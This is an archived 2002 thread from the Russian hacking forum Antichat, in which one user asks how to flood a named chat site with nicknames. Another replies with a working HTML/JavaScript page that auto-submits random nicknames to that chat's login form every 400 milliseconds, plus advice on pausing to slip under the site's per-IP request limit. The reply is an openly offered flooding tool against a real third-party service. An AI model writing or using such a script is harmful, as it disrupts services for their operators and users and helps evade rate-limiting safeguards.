Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Помогите сделать флуд в чате!) Пжалуйсто! ) (https://forum.antichat.xyz/showthread.php?t=173)

23.08.2002 20:56

Люди человеки&#33http://forum.antichat.ru/iB_html/non...icons/wink.gif)) Помогите плиз))) Расскажите как сделать флуд из ников в чате http://www.6684.chatcity.ru/ я попытался но не вышло((( Буду надеяться вы поможете)) Заранее спасибо)

Dj Skeleton™ 24.08.2002 18:58

всё элементарно:

<HTML>
<HEAD>
<TITLE>.::chAT FlooDeR::.</TITLE>
< script>
function flood() {
this.document.chat.mn.value=(Math.floor(Math.rando m()*1000000))
this.document.chat.submit()
}
setInterval ("flood()", 400)
</script>

</HEAD>
<BODY bgColor=#000066 onload="flood()">


<form method=get action="http://www.6684.chatcity.ru/kpobatka" name="chat" target="new">
<input class="fdown" name="mn" value="nick_there" size=15 maxlength=32>
<input type=hidden name="rnd" value="1011522582">
<input class="fdown" type="image" value="Войти">
<input class="fdown" type=button value="Выход" onClick="top.location='http://www.6684.chatcity.ru/kpobatka...#39;">
<input type="hidden" name="c" value="6684"><input type="hidden" name="f" value="11">
</form>

</BODY></HTML>


ЗЫ: тока учти, что через каждые четыре ника придётся делать паузу, т.к. там стоит ограничение на количество запросов с одного ip в минуту!





Время: 04:03